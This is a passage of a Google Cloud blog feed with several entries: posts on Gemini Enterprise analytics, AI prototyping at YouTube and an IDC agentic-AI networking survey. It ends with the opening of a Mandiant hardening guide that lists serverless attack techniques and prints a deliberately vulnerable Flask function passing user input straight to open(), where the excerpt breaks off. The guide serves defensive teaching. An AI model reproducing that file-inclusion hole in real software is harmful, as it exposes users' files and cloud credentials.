&lt;h2 style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Empower your organization with the Gemini Enterprise app and your administrators with BigQuery&lt;/strong&gt;&lt;/h2&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/gemini-enterprise"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Deploy the Gemini Enterprise App&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Bring the best of Google AI to every employee.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/set-up-usage-audit-logs"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Enable Prompt &amp;amp; Response Logging&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Turn on prompt and response logging in the Admin Console to begin recording user activity telemetry.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/logging/docs/routing/overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Configure Log Router Sinks&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Establish sinks to stream telemetry into BigQuery.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/view-analytics"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Track Metrics &amp;amp; Export Analytics&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Access pre-computed, out-of-the-box dashboards on the console and export historical aggregate statistics.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/data-insights"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Extract Table-Level &amp;amp; Dataset-Level Insights&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Explore unfamiliar log tables and discover relationship join paths automatically.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-conversational-analytics-in-bigquery"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Query with Conversational Analytics&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Build data reasoning agents and leverage natural language querying inside BigQuery Studio.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/data-studio?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Visualize with Data Studio&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Connect Data Studio to BigQuery to build executive-level dashboards &amp;amp; give access to BQCA agents to business users.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Consult a Google Cloud Customer Engineer for the most cost-effective and secure configuration for the analytics setup described above.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;The authors would like to acknowledge and thank the Google Forge team, especially Vicky Falconer, Dharini Chandrashekhar and Adhaar Gupta, for contributing to the core work that led to this article.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/analyze-and-govern-gemini-enterprise-at-scale-with-bigquery" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-15T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/why-ai-apps-fail-in-production</id>
    <title>Why AI apps fail in production (And how Google solved it)</title>
    <updated>2026-07-15T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=IYnUpJi7zjY"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Why AI apps fail in production (and how Google solved it)&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=IYnUpJi7zjY"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are living in the golden age of the weekend AI side project. Thanks to agentic engineering and LLMs, the time to go from a blank IDE to a functional local application has dropped from quarters to hours. You can build your wildest ideas over a cup of coffee.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But inside an enterprise ecosystem with rigid infrastructure and millions of users, vibe coding hits an invisible wall. Your local prototype falls apart against corporate networks, cascading errors, or getting blocked by leadership terrified of operational volatility.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;a href="https://mlq.ai/media/quarterly_decks/v0.1_State_of_AI_in_Business_2025_Report.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;data&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is sobering: only 5% of AI prototypes make it to production; the other 95% fall into the validation abyss.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For developers, watching people on social media ship lightning-fast AI deployments while you’re stuck in endless validation loops is maddening. To figure out how to bridge this chasm, I went into the engineering trenches at YouTube to see how they manage this exact speed-versus-risk paradox. What I discovered completely rewrites the playbook on AI software development lifecycle (SDLC) design.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The risk-vs-speed paradox&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When you are solo-building, failure is cheap. Writing agentic code is like piloting a nimble jet fighter—if an AI agent misbehaves, you rewrite the prompt and instantly restart the server.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But as AI engineering leader &lt;/span&gt;&lt;a href="https://addyosmani.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Addy Osmani&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; points out in our premiere of &lt;/span&gt;&lt;a href="http://goo.gle/emergent" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Emergent&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, unconstrained agentic orchestration inside an enterprise introduces an unpredictable blast radius. Addy recalls running ten parallel agents on a personal project, context-hopping and pushing code based purely on quick previews. The technical debt accumulated fast, breaking two apps catastrophically because the modifications weren't properly isolated.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Amplify that risk to the scale of &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;YouTube&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Its infrastructure handles billions of users on a robust, 20-year-old codebase. It is essentially a public utility; you cannot risk overloading it with experimental technical debt. Protecting a platform of this scale requires extensive, slow guardrails:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1_Gemini_Generated_Image" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_Gemini_Generated_Image.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By the time you build a primitive demo through this pipeline, the underlying AI models have evolved, leaving your idea out of date. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;How do you move at lightspeed while minimizing systemic risk? &lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;YouTube’s AI prototyping stack&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deepmind and former YouTube software engineer, &lt;/span&gt;&lt;a href="https://www.linkedin.com/in/benji-bear-25972313a/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Benji Bear&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, solved this puzzle not by accelerating reviews, but by changing infrastructure philosophy. He and his team built a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;prototyping stack &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;— a unified design-to-code lifecycle platform that completely decouples rapid experimentation from mainline production servers. It systematically solves the two primary friction points of developer velocity.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Decoupling the data layer&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Isolating a standalone app completely causes a "blank canvas" problem where you can't test prototypes against realistic conditions. To solve this, developers bootstrap their ideas using pre-built &lt;/span&gt;&lt;a href="https://aistudio.google.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; templates. These templates hook into a proxy server set up on Google Cloud for prototype-approved read-only data. This instantly grants the prototype pre-authenticated, read-only API access to live metadata bundles (playlists, videos, channels) via strict tokens.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2_Gemini_Generated_Image" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_Gemini_Generated_Image.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developers get the technical accuracy of live production parameters without any ability to write back to, pollute, or crash core databases. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Live UI injection&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When a concept requires true real-world validation, the stack offers client-side &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;YouTube Extension wrappers&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This wrapper acts as glue code, allowing developers to inject their experimental features directly into the actual, live production web surface of YouTube.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Code-split chunk safeguards isolate this from production binaries, allowing prototype updates to deploy to a safe staging environment in minutes. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The result? YouTube went from taking multiple quarters to vet an idea to launching several successful prototypes — including &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;YouTube Recap&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Ask YouTube &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;— straight to user research studies (UXR) in weeks.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Embrace throw-away code&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Implementing this stack requires a profound psychological shift. Engineers are trained to treat code as permanent infrastructure, polishing and refactoring it until it’s pristine. But Benji’s core enterprise AI philosophy here is simple: &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Embrace throw-away code.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google AI Studio prototypes are meant to be messy with some technical debt; their objective is to validate product-market fit using quantitative data. Trying to refactor a chaotic, AI-generated app into an enterprise codebase is an architectural trap that can create friction.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_gziujqS.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;But because Google AI Studio builds your prototype directly onto a mirrored version of production infrastructure, you establish a highly accurate baseline from day one. You still discard the messy, AI-generated script, but when an idea proves successful, rewriting it for production becomes significantly faster, cheaper, and safely positioned later in the development lifecycle—giving you a verified blueprint to code against rather than a blank canvas. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Move fast without breaking things&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The core realization here is that a 95% failure rate isn’t a bug — it is the strategy. We should design environments that encourage our teams to fail more frequently and safely.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AI has plummeted the cost of code generation. Consequently, our roles are shifting from syntax gatekeepers to &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;system architects&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Our job is to design the bridges, read-only sandboxes, and isolated pipelines that empower teams to test wild ideas without triggering catastrophic meltdowns.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The biggest risk isn't breaking a server with messy AI code; it's missing the technological moment because validation loops are too slow. By building structural constraints that make failure safe, you give your team the freedom to run at hyper-speed.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;To see the full technical breakdown, interview clips with YouTube's core infrastructure engineers, and a look inside the Google AI Studio Proto-Stack, watch our premiere episode of &lt;/span&gt;&lt;a href="http://goo.gle/emergent" rel="noopener" target="_blank"&gt;&lt;strong style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Emergent&lt;/strong&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; on YouTube.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/why-ai-apps-fail-in-production" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-15T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/networking/idc-on-the-right-networking-approach-for-agentic-ai</id>
    <title>IDC: Why the right networking approach is foundational to agentic AI</title>
    <updated>2026-07-15T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Editor’s note:&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; Today we hear from IDC on the results of its&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; 2026 AI in Networking Special Report Survey exploring the enterprises' concerns about networking infrastructure to support the rise of agentic AI in their organizations. The survey was sponsored by Google Cloud.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enterprises are moving quickly on AI pilots, but the move from pilot to production remains uneven. While AI models remain important, IDC research indicates that the pilot-to-production bottleneck is primarily infrastructure-centric, with core networking concerns emerging as one of the leading drivers of AI project delays and abandonment. In IDC's 2026 &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;AI in Networking Special Report Survey&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;32.6% of respondents cite security concerns:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; As AI workflows become more distributed and autonomous, enforcing consistent security and governance becomes more difficult.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;26.8% of respondents cite challenges in automation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Manual operations and fragmented controls can slow deployment and make AI environments harder to scale.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;24.7% of respondents cite staff time and talent restrictions:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Limited skills and operational bandwidth can constrain an organization's ability to move AI initiatives into production. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agentic AI specifically heightens these concerns by introducing more distributed and dynamic interactions across applications, services, APIs, tools, and data sources. In production environments, these interactions often span different agent frameworks, model providers, clouds, open-source tools, SaaS APIs, and internal applications, expanding both the operational scope and the security and governance surface area. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Networking for operational control, security, and governance at scale&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Networking is the primary enabler of agentic interactions and plays a foundational role for intracloud and intercloud network- and services-layer connectivity, end-to-end security, and consistent governance. In agentic systems, networking increasingly extends into tighter service-centric controls that govern how distributed services identify one another, communicate, and exchange data securely. While AI workloads in general are increasing east-west traffic demands, agentic AI adds an additional layer of complexity by creating dynamic interactions that require tighter policy, visibility, and control closer to the application workflow.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From an infrastructure perspective, networking is much more than just a connectivity function. It is part of the infrastructure platform control plane that applies policy-based controls, supports observability, and helps maintain consistent security and governance across an AI agent's activity. This is significant because framework-level controls alone become insufficient in environments where agents and services span different runtimes, clouds, deployment models, and operating domains.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That is why an infrastructure-level approach becomes key. It does not replace application frameworks or orchestration environments, but it provides broader and more consistent policy implementation across a complex architectural landscape. As agentic AI becomes more autonomous and distributed, organizations need these controls built in as part of the infrastructure to reduce fragmented observability, inconsistent policy application, and unmanaged shadow agent activities. From a cloud infrastructure standpoint, this is where cloud network services become strategically important.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Balancing act: A platform vs. best-of-breed approach&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agentic AI systems are inherently fragmented because of underlying distributed workflows. Enterprises are already navigating a rapidly evolving landscape of business requirements, open-source components, emerging protocol standards, and new architecture patterns. In this context, choices between best-of-breed point solutions and platform-based approaches should be strategic rather than ideological.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Best-of-breed capabilities may be necessary to address specific technical requirements. But it is also true that point solutions introduced across a distributed agentic AI landscape can create inconsistent policies, operational complexity, and governance gaps. IDC research reflects this tension. In IDC’s 2026 &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;AI in Networking Special Report Survey,&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; organizations remained divided between platform and best-of-breed preferences for AI workloads; among respondents who favored platforms, the main reasons cited were stronger security (32.9%), reduced complexity (27.7%), and faster deployment (24.2%).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In IDC's view, a balance is important. Platforms can provide a consistent operational and policy foundation for AI deployments, but at the same time, they need to be modular and extensible to allow the inclusion of best-of-breed functionality as part of the platform toolset. The right platform for agentic AI should be open, flexible, and able to evolve. It should support integration with third-party and open-source tools, allow insertions of needed security and observability functions, and adapt without complete architectural rework.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This is a period of technology disruption. Businesses must meet their AI objectives while carefully managing dynamic agentic AI systems. In this environment, networking not only remains a connectivity piece of the AI infrastructure but becomes foundational to how organizations establish operational control, apply policy consistently, and maintain end-to-end trust across agentic workflows. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As agentic AI systems continue to evolve, the demands they place are unlikely to be addressed through best-of-breed point solutions alone. Operationalizing agentic AI at scale will require organizations to leverage the right networking approach, supported by infrastructure platforms that are open, flexible, and extensible, enabling a cohesive and adaptable security and governance framework.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Message from the sponsor&lt;br /&gt;&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;The autonomous and non-deterministic communications of agentic applications pose challenges for which the infrastructure and governance models of the cloud-native era are not prepared. In the agent-native era, an infrastructure-led approach is required to enable agentic applications at scale in production with effective governance and observability. An extensible platform based on open standards is critical in enabling the agentic journey today and through its maturity. Learn about the infrastructure imperatives and open standards that make a viable agentic infrastructure &lt;/span&gt;&lt;a href="https://services.google.com/fh/files/misc/cloud_infrastructure_in_the_agent_native_era.pdf" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/networking/idc-on-the-right-networking-approach-for-agentic-ai" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-15T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/exposed-cloud-functions-harden</id>
    <title>The Risk of Exposed Cloud Functions and How to Harden</title>
    <updated>2026-07-15T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Corné de Jong&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant security assessments frequently identify publicly exposed serverless applications that lack authentication, often as a result of specific business requirements. Serverless deployments typically run custom-developed code that incorporates third-party packages, making them targets for a wide range of application-level attacks, including:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Local and Remote File Inclusion (LFI/RFI)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Command Injection&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Successful exploitation of these vulnerabilities can grant an attacker full control over the underlying container instance. Such access can serve as a foothold that may ultimately lead to a full compromise of the victim’s cloud environment.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Based on lessons learned in customer engagements, in this blog post we describe attack scenarios and provide actionable guidance on how to secure serverless environments. While this analysis focuses on hardening strategies for Google Cloud Run services and functions that must remain publicly accessible, these principles apply universally to any public serverless deployment.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What are Serverless Applications?&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Serverless applications, also described as Function-as-a-Service (FaaS), allow the deployment of individual blocks of code as microservices within a flexible, decoupled, and event-driven cloud architecture without the need to manage underlying infrastructure. These services enable applications and automations to scale automatically and deploy instantly, removing operational overhead. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Serverless services underpin major e-commerce, media, payment processing applications, and AI usage.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The rapid expansion of generative AI adoption is a significant driver of increased serverless architecture use. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AI workflows, including chatbot interactions, image generation, “vibe-coding”, and multi-step AI agents rely on serverless functions to complete tasks for users. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;This growth has made securing serverless environments a more pressing challenge for enterprise security teams. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Risks of Serverless Application Attacks&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Publicly exposed serverless workloads can serve as an initial access point for threat actors. As noted, these services may contain vulnerabilities within the code, imported packages, or the underlying runtime environment.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once an entry point is exploited, attackers typically attempt to escalate privileges or move laterally. Common techniques observed include:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Extracting secrets stored directly within the application code.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Reviewing application logic and sensitive data to identify further attack vectors within the environment.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exfiltrating service account bearer tokens from the metadata server following successful Remote Code Execution (RCE).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Leveraging these compromised secrets or service accounts allows threat actors to pivot to adjacent systems and workloads, potentially resulting in a total environment takeover if proper hardening strategies are not in place.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Example Attack Scenarios&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The following simplified scenarios illustrate how serverless functions can be compromised and how attackers pivot after achieving initial code execution.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Local File Inclusion (LFI) &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the following Cloud Run example, a Python/Flask function accepts user-controlled input to open a file without performing proper validation. This pattern is an example of a Local File Inclusion (LFI) vulnerability.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;import functions_framework

@functions_framework.http
def hello_http(request):
    request_json = request.get_json(silent=True)
    request_args = request.args
    if request_json and 'file' in request_json:
        file = request_json['file']
    elif request_args and 'file' in request_args:
        file = request_args['file']
 
# VULNERABILITY: The 'file' parameter is used directly in open() 
# without validation, allowing arbitrary file access
    with open(file, 'r') as resp:
          filedata = resp.read()
    return 'local file data {}!'.format(filedata)&lt;/code&gt;&lt;/pre&gt;
